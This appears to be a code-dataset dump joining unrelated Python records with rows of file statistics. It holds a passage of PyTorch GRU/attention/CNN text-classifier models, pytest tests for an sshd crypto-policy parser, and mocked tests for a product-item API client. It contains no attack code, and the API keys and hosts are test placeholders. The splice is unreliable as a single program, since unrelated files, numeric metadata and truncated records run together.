dropout=dropout,
batch_first=True,
)
self.attn = nn.MultiheadAttention(embed_dim=hidden, num_heads=heads, kdim=kdim, vdim=vdim)
self.act = nn.ReLU()
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
#Gru
x = nn.utils.rnn.pack_padded_sequence(x, lengths.cpu(), batch_first=True)
x, _ = self.GRU(x)
x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=False)
#Attn
x, _ = self.attn(x,x,x)
x = self.act(x)
x = torch.transpose(x, 0, 1) # batch first
return (x, lengths)
class ResnetHydraGruAttn(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, heads=8, layers:int=2, vocab_size=20_000, dropout=0.3, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(vocab_size, emb_dims)
self.blocks = nn.Sequential(
GruAttnBlock(emb_dims=emb_dims, hidden=hidden, heads=heads, dropout=dropout),
*(GruAttnBlock(emb_dims=hidden, hidden=hidden, heads=heads, dropout=dropout) for _ in range(layers-1)),
)
self.linear = nn.ModuleList([nn.Sequential(
nn.Dropout(dropout),
nn.Linear(hidden*2, hidden),
nn.ReLU(),
nn.Dropout(dropout),
nn.Linear(hidden, 1)
) for _ in range(classes)])
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
x = self.embeddings(x)
x, lengths = self.blocks((x, lengths))
x = torch.cat((x.mean(1), x.max(1)[0]), dim=1)
x = torch.cat([l(x) for l in self.linear], dim=1)
return x
class DeepHydraGruAttnHead(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, heads=8, layers:int=1, dropout=0.3, **kwargs):
super().__init__()
self.GRU = nn.GRU(
input_size = emb_dims,
hidden_size = hidden,
num_layers = layers,
bidirectional=True,
dropout=dropout,
batch_first=True,
)
self.attn = nn.MultiheadAttention(
embed_dim=hidden*2,
num_heads=heads,
)
self.linear = nn.Sequential(
nn.Dropout(dropout),
nn.Linear(hidden*4, hidden),
nn.ReLU(),
nn.Dropout(dropout),
nn.Linear(hidden, 1),
)
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
#Gru
x = nn.utils.rnn.pack_padded_sequence(x, lengths.cpu(), batch_first=True)
x, _ = self.GRU(x)
x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=False)
#Attention
x, _ = self.attn(x,x,x)
x = torch.cat((x.mean(0), x.max(0)[0]), dim=1)
x = self.linear(x)
return x
class DeepHydraGruAttn(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, heads=8, layers:int=2, vocab_size=20_000, dropout=0.3, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(vocab_size, emb_dims)
self.GRU = nn.GRU(
input_size = emb_dims,
hidden_size = hidden//2,
num_layers = layers,
bidirectional=True,
dropout=dropout,
batch_first=True,
)
self.attn = nn.MultiheadAttention(
embed_dim=hidden,
num_heads=heads,
)
self.heads = nn.ModuleList([DeepHydraGruAttnHead(
emb_dims=hidden, hidden=hidden, heads=heads, layers=layers, dropout=dropout
) for _ in range(classes)])
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
lengths = lengths.cpu()
x = self.embeddings(x)
#Gru
x = nn.utils.rnn.pack_padded_sequence(x, lengths, batch_first=True)
x, _ = self.GRU(x)
x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=False)
#Attention
x, _ = self.attn(x,x,x)
x = torch.transpose(x, 0, 1)
x = torch.cat([h(x, lengths) for h in self.heads], dim=1)
return x
class ToxicOnly(nn.Module):
def __init__(self, *args, **kwargs):
super().__init__()
self.model = ResnetHydraGruAttn(*args, **kwargs)
def forward(self, x, lengths=None):
x = self.model(x, lengths)
x[1:] = 0
return x
class PureHydraGruAttn(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, heads=8, layers:int=2, vocab_size=20_000, dropout=0.3, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(vocab_size, emb_dims)
self.heads = nn.ModuleList([DeepHydraGruAttnHead(
emb_dims=emb_dims, hidden=hidden, heads=heads, layers=layers, dropout=dropout
) for _ in range(classes)])
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
lengths = lengths.cpu()
x = self.embeddings(x)
x = torch.cat([h(x, lengths) for h in self.heads], dim=1)
return x
class CNNGruAttn(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, heads=8, layers:int=2, vocab_size=20_000, dropout=0.3, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(vocab_size, emb_dims)
self.CNN = nn.Sequential(
nn.Conv1d(emb_dims, hidden, 3, padding=1),
nn.Dropout(dropout),
nn.ReLU(),
)
self.GRU = nn.GRU(
input_size = hidden,
hidden_size = hidden//2,
num_layers = layers,
bidirectional=True,
dropout=dropout,
batch_first=True,
)
self.attn = nn.MultiheadAttention(
embed_dim=hidden,
num_heads=heads,
)
self.linear = nn.ModuleList([nn.Sequential(
nn.Dropout(dropout),
nn.Linear(hidden*2, hidden),
nn.ReLU(),
nn.Dropout(dropout),
nn.Linear(hidden, 1)
) for _ in range(classes)])
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
lengths = lengths.cpu()
x = self.embeddings(x)
#CNN
x = torch.transpose(x, 1, 2)
x = self.CNN(x)
x = torch.transpose(x, 1, 2)
#Gru
x = nn.utils.rnn.pack_padded_sequence(x, lengths, batch_first=True)
x, _ = self.GRU(x)
x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=False)
#Attention
x, _ = self.attn(x,x,x)
x = torch.cat((x.mean(0), x.max(0)[0]), dim=1)
x = torch.cat([l(x) for l in self.linear], dim=1)
return x
class CNNGruAttnSplit(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, heads=8, layers:int=2, vocab_size=20_000, dropout=0.3, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(vocab_size, emb_dims)
self.CNN = nn.Sequential(
nn.Conv1d(emb_dims, hidden, 3, padding=1),
nn.Dropout(dropout),
nn.ReLU(),
)
self.GRU = nn.GRU(
input_size = emb_dims,
hidden_size = hidden//2,
num_layers = layers,
bidirectional=True,
dropout=dropout,
batch_first=True,
)
self.attn = nn.MultiheadAttention(
embed_dim=emb_dims,
num_heads=heads,
)
self.linear = nn.ModuleList([nn.Sequential(
nn.Dropout(dropout),
nn.Linear(hidden*4+emb_dims*2, hidden),
nn.ReLU(),
nn.Dropout(dropout),
nn.Linear(hidden, 1)
) for _ in range(classes)])
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
lengths = lengths.cpu()
x = self.embeddings(x)
#CNN
cnn_o = torch.transpose(x, 1, 2)
cnn_o = self.CNN(cnn_o) #(B, C, N)
#Gru
gru_o = nn.utils.rnn.pack_padded_sequence(x, lengths, batch_first=True)
gru_o, _ = self.GRU(gru_o)
gru_o, _ = nn.utils.rnn.pad_packed_sequence(gru_o, batch_first=False) #(N, B, C)
#Attention
attn_o = torch.transpose(x, 0, 1)
attn_o, _ = self.attn(attn_o,attn_o,attn_o) #(N, B, C)
x = torch.cat((
cnn_o.mean(-1),
cnn_o.max(-1)[0],
gru_o.mean(0),
gru_o.max(0)[0],
attn_o.mean(0),
attn_o.max(0)[0],
), dim=1)
x = torch.cat([l(x) for l in self.linear], dim=1)
return x
class CNNGruAttnCascade(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, heads=8, layers:int=2, vocab_size=20_000, dropout=0.3, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(vocab_size, emb_dims)
self.CNN = nn.Sequential(
nn.Conv1d(emb_dims, hidden, 3, padding=1),
nn.Dropout(dropout),
nn.ReLU(),
)
self.GRU = nn.GRU(
input_size = hidden+emb_dims,
hidden_size = hidden//2,
num_layers = layers,
bidirectional=True,
dropout=dropout,
batch_first=True,
)
self.attn = nn.MultiheadAttention(
embed_dim=hidden*2+emb_dims,
num_heads=heads,
)
self.linear = nn.ModuleList([nn.Sequential(
nn.Dropout(dropout),
nn.Linear((hidden*2+emb_dims)*4, hidden),
nn.ReLU(),
nn.Dropout(dropout),
nn.Linear(hidden, 1)
) for _ in range(classes)])
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
lengths = lengths.cpu()
x = self.embeddings(x)
#CNN
cnn = torch.transpose(x, 1, 2)
cnn = self.CNN(cnn)
cnn = torch.transpose(cnn, 1, 2)
x = torch.cat((x, cnn), dim=2)
#Gru
gru = nn.utils.rnn.pack_padded_sequence(x, lengths, batch_first=True)
gru, _ = self.GRU(gru)
gru, _ = nn.utils.rnn.pad_packed_sequence(gru, batch_first=False)
x = torch.transpose(x, 0, 1)
x = torch.cat((x, gru), dim=2)
#Attention
attn, _ = self.attn(x,x,x)
x = torch.cat((x, attn), dim=2)
x = torch.cat((x.mean(0), x.max(0)[0]), dim=1)
x = torch.cat([l(x) for l in self.linear], dim=1)
return x
class FFTConv1d(nn.Conv1d):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def _conv_forward(self, input, weight, bias):
input = F.pad(input, self.padding + self.padding)
padded_weight = F.pad(weight, (0, input.shape[-1] - weight.shape[-1]))
input_ft = torch.fft.rfft(input)
weight_ft = torch.fft.rfft(padded_weight)
out_ft = torch.einsum("ab..., cb... -> ac...", input_ft, weight_ft)
out = torch.fft.irfft(out_ft)
if bias is not None:
out = out + bias[None, :, None]
return out
class FFTCNNGruAttn(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, heads=8, layers:int=2, vocab_size=20_000, dropout=0.3, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(vocab_size, emb_dims)
self.CNN = nn.Sequential(
FFTConv1d(emb_dims, hidden, 64, padding=1),
nn.Dropout(dropout),
nn.ReLU(),
)
self.GRU = nn.GRU(
input_size = hidden,
hidden_size = hidden//2,
num_layers = layers,
bidirectional=True,
dropout=dropout,
batch_first=True,
)
self.attn = nn.MultiheadAttention(
embed_dim=hidden,
num_heads=heads,
)
self.linear = nn.ModuleList([nn.Sequential(
nn.Dropout(dropout),
nn.Linear(hidden*2, hidden),
nn.ReLU(),
nn.Dropout(dropout),
nn.Linear(hidden, 1)
) for _ in range(classes)])
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
lengths = lengths.cpu()
x = self.embeddings(x)
#CNN
x = torch.transpose(x, 1, 2)
x = self.CNN(x)
x = torch.transpose(x, 1, 2)
#Gru
x = nn.utils.rnn.pack_padded_sequence(x, lengths, batch_first=True)
x, _ = self.GRU(x)
x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=False)
#Attention
x, _ = self.attn(x,x,x)
x = torch.cat((x.mean(0), x.max(0)[0]), dim=1)
x = torch.cat([l(x) for l in self.linear], dim=1)
return x
class FFTCNN(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, layers:int=2, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(20_000, emb_dims)
self.CNN = nn.Sequential(
FFTConv1d(emb_dims, hidden, 3),
nn.Dropout(0.3),
nn.ReLU(),
FFTConv1d(hidden, hidden, 3),
nn.Dropout(0.3),
nn.ReLU(),
nn.AdaptiveMaxPool1d(1),
)
self.linear = nn.Sequential(
nn.Dropout(0.3),
nn.Linear(hidden, hidden),
nn.ReLU(),
nn.Dropout(0.3),
nn.Linear(hidden, classes),
)
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
x = self.embeddings(x)
x = torch.transpose(x, 1, 2)
x = self.CNN(x)
return self.linear(x[...,0])
| 26.308609 | 133 | 0.658209 | 3,117 | 19,863 | 4.035932 | 0.048123 | 0.039507 | 0.019316 | 0.031479 | 0.875914 | 0.868998 | 0.859777 | 0.829332 | 0.805087 | 0.789269 | 0 | 0.029526 | 0.181544 | 19,863 | 755 | 134 | 26.308609 | 0.744295 | 0.014902 | 0 | 0.711755 | 0 | 0 | 0.005477 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067633 | false | 0 | 0.006441 | 0 | 0.141707 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
176c380280a850e80792e504381d1533da5ea51b | 6,003 | py | Python | insights/parsers/tests/test_crypto_policies_opensshserver.py | lhuett/insights-core | 1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8 | [
"Apache-2.0"
] | 121 | 2017-05-30T20:23:25.000Z | 2022-03-23T12:52:15.000Z | insights/parsers/tests/test_crypto_policies_opensshserver.py | lhuett/insights-core | 1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8 | [
"Apache-2.0"
] | 1,977 | 2017-05-26T14:36:03.000Z | 2022-03-31T10:38:53.000Z | insights/parsers/tests/test_crypto_policies_opensshserver.py | lhuett/insights-core | 1c84eeffc037f85e2bbf60c9a302c83aa1a50cf8 | [
"Apache-2.0"
] | 244 | 2017-05-30T20:22:57.000Z | 2022-03-26T10:09:39.000Z | from insights.tests import context_wrap
from insights.parsers.crypto_policies import CryptoPoliciesOpensshserver
CPSSHD_1 = """
CRYPTO_POLICY='-oCiphers=aes256-gcm@openssh.com,3des-cbc -oMACs=umac-128-etm@openssh.com'
""".strip()
CPSSHD_2 = """
CRYPTO_POLICY='-oCiphers=aes256-gcm@openssh.com,3des-cbc -oMACs=umac-128-etm@openssh.com,hmac-sha1-etm@openssh.com -oGSSAPIKexAlgorithms=gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ssh-rsa,ssh-rsa-cert-v01@openssh.com,ssh-dss,ssh-dss-cert-v01@openssh.com,rsa-sha2-256,ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,rsa-sha2-512,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ssh-rsa,ssh-rsa-cert-v01@openssh.com,ssh-dss,ssh-dss-cert-v01@openssh.com,rsa-sha2-256,ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,rsa-sha2-512,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com'
""" # no strip on purpose
def test_crypto_policies_opensshserver_1():
result = CryptoPoliciesOpensshserver(context_wrap(CPSSHD_1))
assert result["CRYPTO_POLICY"] == '-oCiphers=aes256-gcm@openssh.com,3des-cbc -oMACs=umac-128-etm@openssh.com'
assert result.get("CRYPTO_POLICY") == '-oCiphers=aes256-gcm@openssh.com,3des-cbc -oMACs=umac-128-etm@openssh.com'
assert result.get("OPTIONS1") is None
assert "OPTIONS1" not in result
assert "CRYPTO_POLICY" in result
assert result.options == '-oCiphers=aes256-gcm@openssh.com,3des-cbc -oMACs=umac-128-etm@openssh.com'
def test_crypto_policies_opensshserver_2():
result = CryptoPoliciesOpensshserver(context_wrap(CPSSHD_2))
assert result["CRYPTO_POLICY"] == '-oCiphers=aes256-gcm@openssh.com,3des-cbc -oMACs=umac-128-etm@openssh.com,hmac-sha1-etm@openssh.com -oGSSAPIKexAlgorithms=gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ssh-rsa,ssh-rsa-cert-v01@openssh.com,ssh-dss,ssh-dss-cert-v01@openssh.com,rsa-sha2-256,ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,rsa-sha2-512,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ssh-rsa,ssh-rsa-cert-v01@openssh.com,ssh-dss,ssh-dss-cert-v01@openssh.com,rsa-sha2-256,ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,rsa-sha2-512,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com'
assert result.get("CRYPTO_POLICY") == '-oCiphers=aes256-gcm@openssh.com,3des-cbc -oMACs=umac-128-etm@openssh.com,hmac-sha1-etm@openssh.com -oGSSAPIKexAlgorithms=gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ssh-rsa,ssh-rsa-cert-v01@openssh.com,ssh-dss,ssh-dss-cert-v01@openssh.com,rsa-sha2-256,ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,rsa-sha2-512,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ssh-rsa,ssh-rsa-cert-v01@openssh.com,ssh-dss,ssh-dss-cert-v01@openssh.com,rsa-sha2-256,ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,rsa-sha2-512,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com'
assert result.get("OPTIONS1") is None
assert "OPTIONS1" not in result
assert "CRYPTO_POLICY" in result
assert result.options == '-oCiphers=aes256-gcm@openssh.com,3des-cbc -oMACs=umac-128-etm@openssh.com,hmac-sha1-etm@openssh.com -oGSSAPIKexAlgorithms=gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ssh-rsa,ssh-rsa-cert-v01@openssh.com,ssh-dss,ssh-dss-cert-v01@openssh.com,rsa-sha2-256,ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,rsa-sha2-512,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ssh-rsa,ssh-rsa-cert-v01@openssh.com,ssh-dss,ssh-dss-cert-v01@openssh.com,rsa-sha2-256,ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,rsa-sha2-512,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com'
def test_crypto_policies_opensshserver_empty():
result = CryptoPoliciesOpensshserver(context_wrap(""))
assert "OPTIONS1" not in result
assert "CRYPTO_POLICY" not in result
assert result.options is None
| 153.923077 | 1,190 | 0.810761 | 932 | 6,003 | 5.189914 | 0.081545 | 0.140583 | 0.138929 | 0.1687 | 0.959272 | 0.925987 | 0.925987 | 0.911929 | 0.903039 | 0.903039 | 0 | 0.11855 | 0.034649 | 6,003 | 38 | 1,191 | 157.973684 | 0.716135 | 0.003165 | 0 | 0.241379 | 0 | 0.275862 | 0.843196 | 0.816449 | 0 | 0 | 0 | 0 | 0.517241 | 1 | 0.103448 | false | 0 | 0.068966 | 0 | 0.172414 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
17902a46be98df178e822a64fe5894b76edceae5 | 9,399 | py | Python | tests/plugins/product/test_api.py | cloudblue/product-sync | 0e1754967830b19673c1625b82ae1535658ec3bc | [
"Apache-2.0"
] | null | null | null | tests/plugins/product/test_api.py | cloudblue/product-sync | 0e1754967830b19673c1625b82ae1535658ec3bc | [
"Apache-2.0"
] | null | null | null | tests/plugins/product/test_api.py | cloudblue/product-sync | 0e1754967830b19673c1625b82ae1535658ec3bc | [
"Apache-2.0"
] | null | null | null | import pytest
from click.exceptions import ClickException
from connect.cli.plugins.product.api import (
create_item,
create_unit,
delete_item,
get_item,
get_item_by_mpn,
update_item,
)
from connect.client import ConnectClient
def test_get_item(
mocked_responses,
mocked_items_response,
):
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
json=mocked_items_response[0],
)
item = get_item(
client=client,
product_id='PRD-276-377-545',
item_id='PRD-276-377-545-0001',
)
assert item == mocked_items_response[0]
def test_get_item_exception_404(
mocked_responses,
):
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
status=404,
)
item = get_item(
client=client,
product_id='PRD-276-377-545',
item_id='PRD-276-377-545-0001',
)
assert item is None
def test_get_item_exception_500(
mocked_responses,
):
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
status=500,
)
with pytest.raises(ClickException) as e:
get_item(
client=client,
product_id='PRD-276-377-545',
item_id='PRD-276-377-545-0001',
)
assert str(e.value) == "500 - Internal Server Error: unexpected error."
def test_create_unit(
mocked_responses,
):
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/settings/units',
json={
"id": "unit",
"name": "unit-k",
},
status=200,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
result = create_unit(
client=client,
data={
"name": "unit-k",
},
)
assert result['id'] == 'unit'
assert mocked_responses.assert_all_requests_are_fired
def test_create_unit_500(
mocked_responses,
):
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/settings/units',
status=500,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
with pytest.raises(ClickException) as e:
create_unit(
client=client,
data={
"name": "unit-k",
},
)
assert str(e.value) == "500 - Internal Server Error: unexpected error."
def test_get_item_by_mpn(
mocked_responses,
mocked_items_response,
):
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=1&offset=0',
json=[mocked_items_response[0]],
status=200,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
item = get_item_by_mpn(
client=client,
product_id='PRD-276-377-545',
mpn='MPN-R-001',
)
assert item == mocked_items_response[0]
def test_get_item_by_mpn_500(
mocked_responses,
):
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,MPN-R-001)&limit=1&offset=0',
status=500,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
with pytest.raises(ClickException) as e:
get_item_by_mpn(
client=client,
product_id='PRD-276-377-545',
mpn='MPN-R-001',
)
assert str(e.value) == "500 - Internal Server Error: unexpected error."
def test_get_item_by_mpn_404(
mocked_responses,
):
mocked_responses.add(
method='GET',
url='https://localhost/public/v1/products/PRD-276-377-545/items?eq(mpn,'
'MPN-R-001)&limit=1&offset=0',
json=[],
status=404,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
item = get_item_by_mpn(
client=client,
product_id='PRD-276-377-545',
mpn='MPN-R-001',
)
assert item is None
def test_create_item(
mocked_responses,
mocked_items_response,
):
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/products/PRD-276-377-545/items',
json=mocked_items_response[0],
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
item = create_item(
client=client,
product_id='PRD-276-377-545',
data=mocked_items_response[0],
)
assert item == mocked_items_response[0]
assert mocked_responses.assert_all_requests_are_fired
def test_create_item_409(
mocked_responses,
mocked_items_response,
):
mocked_responses.add(
method='POST',
url='https://localhost/public/v1/products/PRD-276-377-545/items',
json={
"error_code": "VAL_001",
"errors": [
"name: Item with same name already exists for the product.",
"mpn: Item with same mpn already exists for the product.",
],
},
status=400,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
with pytest.raises(ClickException) as e:
create_item(
client=client,
product_id='PRD-276-377-545',
data=mocked_items_response[0],
)
assert "400 - Bad Request: VAL_001 " in str(e.value)
def test_update_item(
mocked_responses,
mocked_items_response,
):
mocked_responses.add(
method='PUT',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
json=mocked_items_response[0],
status=200,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
item = update_item(
client=client,
product_id='PRD-276-377-545',
item_id='PRD-276-377-545-0001',
data=mocked_items_response[0],
)
assert item == mocked_items_response[0]
def test_update_item_mpn_exists(
mocked_responses,
mocked_items_response,
):
mocked_responses.add(
method='PUT',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
json={
"error_code": "VAL_001",
"errors": [
"mpn: Item with same mpn already exists for the product.",
],
},
status=400,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
with pytest.raises(ClickException) as e:
update_item(
client=client,
product_id='PRD-276-377-545',
item_id='PRD-276-377-545-0001',
data=mocked_items_response[0],
)
assert 'Item with same mpn already exists for the product.' in str(e.value)
def test_delete_item(
mocked_responses,
):
mocked_responses.add(
method='DELETE',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
json={},
status=204,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
delete_item(
client=client,
product_id='PRD-276-377-545',
item_id='PRD-276-377-545-0001',
)
assert mocked_responses.assert_all_requests_are_fired
def test_delete_item_published(
mocked_responses,
):
mocked_responses.add(
method='DELETE',
url='https://localhost/public/v1/products/PRD-276-377-545/items/PRD-276-377-545-0001',
json={
"error_code": "PRD_038",
"errors": [
"Only draft Item can be deleted.",
],
},
status=400,
)
client = ConnectClient(
api_key='ApiKey SU:123',
use_specs=False,
endpoint='https://localhost/public/v1',
)
with pytest.raises(ClickException) as e:
delete_item(
client=client,
product_id='PRD-276-377-545',
item_id='PRD-276-377-545-0001',
)
assert 'Only draft Item can be deleted.' in str(e.value)
| 24.286822 | 108 | 0.586765 | 1,137 | 9,399 | 4.669305 | 0.094987 | 0.042946 | 0.064419 | 0.085892 | 0.92654 | 0.910153 | 0.874741 | 0.873611 | 0.866076 | 0.839518 | 0 | 0.08662 | 0.285137 | 9,399 | 386 | 109 | 24.349741 | 0.703527 | 0 | 0 | 0.709877 | 0 | 0.030864 | 0.27088 | 0.005745 | 0 | 0 | 0 | 0 | 0.049383 | 1 | 0.04321 | false | 0 | 0.012346 | 0 | 0.055556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bd6daffe6ce1b5a8bba19b5c7bfafe701fb2e9d0 | 142 | py | Python | 16_loops_pat.py | teluguprogrammer/learn-python3 | 9565b50ecfff5c2ae39e780afb9a2a15682d1109 | [
"MIT"
] | null | null | null | 16_loops_pat.py | teluguprogrammer/learn-python3 | 9565b50ecfff5c2ae39e780afb9a2a15682d1109 | [
"MIT"
